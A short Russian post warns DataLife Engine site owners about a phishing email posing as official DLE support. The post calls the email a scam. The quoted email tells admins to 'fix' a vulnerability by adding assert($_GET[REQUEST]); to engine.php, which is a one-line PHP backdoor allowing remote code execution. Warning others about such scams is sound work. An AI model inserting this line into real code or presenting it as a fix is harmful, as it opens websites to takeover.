В очередной раз на очередной сайт на DLE пришло письмо от support@dle-news.ru:
Это развод. Не ведитесь!
| Цитата |
|---|
| Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте сайт.ru нашего ПО «CMS DataLife Engine - Система управления сайтами». Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных. По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников. Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: сайт.ru/engine/engine.php и в самое начало файла после строчки: <?php добавьте: assert($_GET[REQUEST]); С уважением, Служба поддержки «DataLife Engine» |
Это развод. Не ведитесь!
